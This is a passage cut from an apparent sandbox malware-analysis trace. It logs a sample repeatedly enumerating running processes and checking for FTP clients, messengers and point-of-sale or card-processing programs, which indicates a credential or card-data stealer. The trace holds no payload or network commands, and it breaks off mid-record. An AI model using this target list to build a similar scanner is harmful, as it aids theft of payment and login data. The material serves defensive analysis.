th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0178.791] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0178.794] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0178.797] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0178.800] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0178.803] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0178.805] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0178.815] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0178.818] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0178.821] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0178.824] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0178.827] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0178.830] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0178.832] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0178.834] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0178.836] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0178.838] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0178.840] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0178.843] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0178.845] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0178.846] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0178.848] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0178.854] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0178.857] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0178.858] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0178.861] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0178.863] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0178.866] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0178.868] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0178.869] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0178.871] CloseHandle (hObject=0xb38) returned 1 [0178.871] Sleep (dwMilliseconds=0x64) [0178.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcb8 [0179.021] Process32First (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.023] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.025] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.027] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.029] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.032] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.034] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.036] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.038] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.041] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.084] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.087] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.089] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.091] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.094] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.096] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.098] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.100] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.103] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.105] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.107] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0179.109] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.112] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0179.114] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.117] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0179.190] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0179.193] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0179.268] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0179.270] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0179.272] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0179.274] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.277] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.280] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0179.282] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0179.284] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.286] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.290] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0179.292] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0179.295] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0179.297] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0179.342] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0179.344] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0179.345] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0179.347] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0179.350] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0179.352] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0179.354] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0179.355] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0179.357] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0179.359] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0179.361] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0179.363] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0179.365] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0179.367] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0179.369] Process32Next (in: hSnapshot=0xcb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, 